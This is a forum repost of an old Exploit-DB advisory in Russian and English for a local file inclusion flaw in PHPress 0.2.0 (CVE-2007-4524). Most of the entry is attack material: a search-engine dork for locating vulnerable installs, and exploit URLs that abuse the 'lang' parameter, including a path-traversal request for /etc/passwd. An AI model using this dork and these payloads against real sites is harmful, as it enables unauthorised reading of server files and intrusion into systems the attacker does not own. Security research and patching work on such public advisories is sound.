Exploit PHPress 0.2.0 - 'adisplay.php?lang' Local File Inclusion

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
4382
Проверка EDB
  1. Пройдено
Автор
NICE NAME CREW
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2007-4524
Дата публикации
2007-09-08
Код:
:::::::::::::::::::::::::::::::::::::::::::::::::::.......................
::| \ | (_)          | \ | |                       / ____|                  
::|  \| |_  ___ ___  |  \| | __ _ _ __ ___   ___  | |     _ __ _____      __
::| . ` | |/ __/ _ \ | . ` |/ _` | '_ ` _ \ / _ \ | |    | '__/ _ \ \ /\ / /
::| |\  | | (_|  __/ | |\  | (_| | | | | | |  __/ | |____| | |  __/\ V  V / 
::|_| \_|_|\___\___| |_| \_|\__,_|_| |_| |_|\___|  \_____|_|  \___| \_/\_/
:::::::::::::::::::::::::::::We got the nicest name in the security scene!
::::::::Info::.
::Script: phpress 
::Version: 0.2.0 
::Homepage:http://sourceforge.net/projects/phpress/
::
:::::::::Details::.
::Type: Local_File_Inclusion
::Dork: allinurl:/phpress/
::Exploit: http://host/phpress/adisplay.php?lang=shell
::Exploit: http://host/phpress/adisplay.php?lang=../../etc/passwd
::
::Variable lang is not defined
::
::::::::::::::::::::::::::::::::.
:::::::::::Additional_Information::.
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::.
::Contact: [email protected]
::Website: none yet
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::.

# milw0rm.com [2007-09-08]
 
Источник
www.exploit-db.com

Похожие темы